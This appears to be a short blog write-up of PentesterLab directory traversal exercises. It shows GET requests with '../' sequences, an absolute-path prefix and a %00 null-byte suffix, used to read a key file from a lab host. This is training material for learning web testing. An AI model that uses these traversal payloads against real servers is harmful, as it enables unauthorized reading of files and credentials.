Scenario 1:
We found a value available in the URL (burp request)
GET /file.php?file=hacker.png HTTP/1.1
“file = hacker.png ” is a value.
Here we tried to move upward and found the file which was required.
GET /file.php?file=../../pentesterlab.key HTTP/1.1
Scenario 2:
We found a path available in source of the page and
GET /file.php?file=/var/www/ HTTP/1.1 (burp request)
Then we injected
GET /file.php?file=/var/www/../../pentesterlab.key HTTP/1.1
And found the file.
Note :- we can give as many as ../../../ because it will not go too far after the root.
Scenario 3:
Use %00 (comment after this, and before %00 it will execute everything)
Main URL: -
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=hacker
Checking but do not work:-
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=hacker.png
Checking and works:-
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=hacker.png%00
Final payload is:-
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=../../../../../pentesterlab.key%00
Comments
Post a Comment